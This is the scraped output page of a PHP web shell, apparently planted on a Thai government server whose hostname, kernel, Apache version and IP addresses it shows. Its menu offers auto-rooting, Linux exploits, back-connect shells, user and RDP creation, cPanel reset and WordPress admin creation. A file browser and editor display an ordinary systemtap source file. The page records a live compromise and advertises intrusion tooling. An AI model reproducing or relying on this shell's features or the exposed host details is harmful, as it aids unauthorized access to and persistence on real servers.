Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
tapset /
[ HOME SHELL ]
Name
Size
Permission
Action
arm
[ DIR ]
drwxr-xr-x
arm64
[ DIR ]
drwxr-xr-x
dyninst
[ DIR ]
drwxr-xr-x
i386
[ DIR ]
drwxr-xr-x
ia64
[ DIR ]
drwxr-xr-x
linux
[ DIR ]
drwxr-xr-x
powerpc
[ DIR ]
drwxr-xr-x
s390
[ DIR ]
drwxr-xr-x
x86_64
[ DIR ]
drwxr-xr-x
README
371
B
-rw-r--r--
ansi.stp
3.93
KB
-rw-r--r--
argv.stp
2.53
KB
-rw-r--r--
choose_defined.stpm
208
B
-rw-r--r--
container_of.stpm
235
B
-rw-r--r--
context.stp
4.95
KB
-rw-r--r--
errno.stp
8.21
KB
-rw-r--r--
indent-default.stp
59
B
-rw-r--r--
indent.stp
4.44
KB
-rw-r--r--
init.stp
269
B
-rw-r--r--
java.stp
1.3
KB
-rw-r--r--
libpython2.6-64.stp
522
B
-rw-r--r--
logging.stp
2.78
KB
-rw-r--r--
macros.stpm
169
B
-rw-r--r--
null.stp
17
B
-rw-r--r--
offsetof.stpm
173
B
-rw-r--r--
oneshot.stp
38
B
-rw-r--r--
pn.stp
1.55
KB
-rw-r--r--
queue_stats.stp
9.21
KB
-rw-r--r--
random.stp
417
B
-rw-r--r--
registers.stp
7.4
KB
-rw-r--r--
speculative.stp
1.67
KB
-rw-r--r--
stap_staticmarkers.stp
9.44
KB
-rw-r--r--
stopwatch.stp
2.98
KB
-rw-r--r--
string.stp
5.59
KB
-rw-r--r--
switchfile.stp
612
B
-rw-r--r--
system.stp
473
B
-rw-r--r--
timers.stp
822
B
-rw-r--r--
tokenize.stp
1.63
KB
-rw-r--r--
type_defined.stpm
363
B
-rw-r--r--
tzinfo.stp
930
B
-rw-r--r--
uconversions.stp
23.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : context.stp
// context tapset // Copyright (C) 2005-2011 Red Hat Inc. // Copyright (C) 2006 Intel Corporation. // // This file is part of systemtap, and is free software. You can // redistribute it and/or modify it under the terms of the GNU General // Public License (GPL); either version 2, or (at your option) any // later version. // <tapsetdescription> // Context functions provide additional information about where an event occurred. These functions can //provide information such as a backtrace to where the event occurred and the current register values for the //processor. // </tapsetdescription> /** * sfunction print_regs - Print a register dump * * Description: This function prints a register dump. Does nothing if no registers are available for the probe point. */ function print_regs () %{ if (c->user_mode_p && CONTEXT->uregs) { _stp_print_regs (CONTEXT->uregs); } else if (CONTEXT->kregs) { _stp_print_regs (CONTEXT->kregs); } %} /** * sfunction pp - Returns the active probe point * * Description: This function returns the fully-resolved probe point * associated with a currently running probe handler, including alias * and wild-card expansion effects. Context: The current probe point. */ function pp:string () %{ /* pure */ /* unprivileged */ /* stable */ strlcpy (STAP_RETVALUE, CONTEXT->probe_point, MAXSTRINGLEN); %} /** * sfunction ppfunc - Returns the function name parsed from pp() * * Description: This returns the function name from the current pp(). * Not all pp() have functions in them, in which case "" is returned. */ function ppfunc:string () %{ /* pure */ /* unprivileged */ /* stable */ char *ptr, *start; /* This is based on the pre-2.0 behavior of probefunc(), but without * the _stp_snprint_addr fallback, so we're purely pp()-based. * * The obsolete inline("...") syntax is dropped, but in its place we'll * look for function names in statement("...") form. */ STAP_RETVALUE[0] = '\0'; start = strstr(CONTEXT->probe_point, "function(\""); ptr = start + 10; if (!start) { start = strstr(CONTEXT->probe_point, "statement(\""); ptr = start + 11; } if (start) { int len = MAXSTRINGLEN; char *dst = STAP_RETVALUE; while (*ptr != '@' && *ptr != '"' && --len > 0 && *ptr) *dst++ = *ptr++; *dst = 0; } %} /** * sfunction probe_type - The low level probe handler type of the current probe. * * Description: Returns a short string describing the low level probe handler * type for the current probe point. This is for informational purposes only. * Depending on the low level probe handler different context functions can * or cannot provide information about the current event (for example some * probe handlers only trigger in user space and have no associated kernel * context). High-level probes might map to the same or different low-level * probes (depending on systemtap version and/or kernel used). */ function probe_type:string() %{ /* pure */ /* unprivileged */ /* stable */ switch (CONTEXT->probe_type) { case stp_probe_type_been: strlcpy (STAP_RETVALUE, "begin_end", MAXSTRINGLEN); break; case stp_probe_type_itrace: strlcpy (STAP_RETVALUE, "itrace", MAXSTRINGLEN); break; case stp_probe_type_marker: strlcpy (STAP_RETVALUE, "kernel_marker", MAXSTRINGLEN); break; case stp_probe_type_perf: strlcpy (STAP_RETVALUE, "perf_event", MAXSTRINGLEN); break; case stp_probe_type_procfs: strlcpy (STAP_RETVALUE, "procfs", MAXSTRINGLEN); break; case stp_probe_type_timer: strlcpy (STAP_RETVALUE, "timer", MAXSTRINGLEN); break; case stp_probe_type_hrtimer: strlcpy (STAP_RETVALUE, "hrtimer", MAXSTRINGLEN); break; case stp_probe_type_profile_timer: strlcpy (STAP_RETVALUE, "profile_timer", MAXSTRINGLEN); break; case stp_probe_type_netfilter: strlcpy (STAP_RETVALUE, "netfilter", MAXSTRINGLEN); break; case stp_probe_type_utrace: strlcpy (STAP_RETVALUE, "utrace", MAXSTRINGLEN); break; case stp_probe_type_utrace_syscall: strlcpy (STAP_RETVALUE, "utrace_syscall", MAXSTRINGLEN); break; case stp_probe_type_kprobe: strlcpy (STAP_RETVALUE, "kprobe", MAXSTRINGLEN); break; case stp_probe_type_kretprobe: strlcpy (STAP_RETVALUE, "kretprobe", MAXSTRINGLEN); break; case stp_probe_type_uprobe: strlcpy (STAP_RETVALUE, "uprobe", MAXSTRINGLEN); break; case stp_probe_type_uretprobe: strlcpy (STAP_RETVALUE, "uretprobe", MAXSTRINGLEN); break; case stp_probe_type_hwbkpt: strlcpy (STAP_RETVALUE, "hardware_data_breakpoint", MAXSTRINGLEN); break; case stp_probe_type_tracepoint: strlcpy (STAP_RETVALUE, "kernel_tracepoint", MAXSTRINGLEN); break; default: /* This should never happen. */ snprintf(CONTEXT->error_buffer, sizeof(CONTEXT->error_buffer), "Unknown probe-type state %d", CONTEXT->probe_type); CONTEXT->last_error = CONTEXT->error_buffer; break; } %}
Close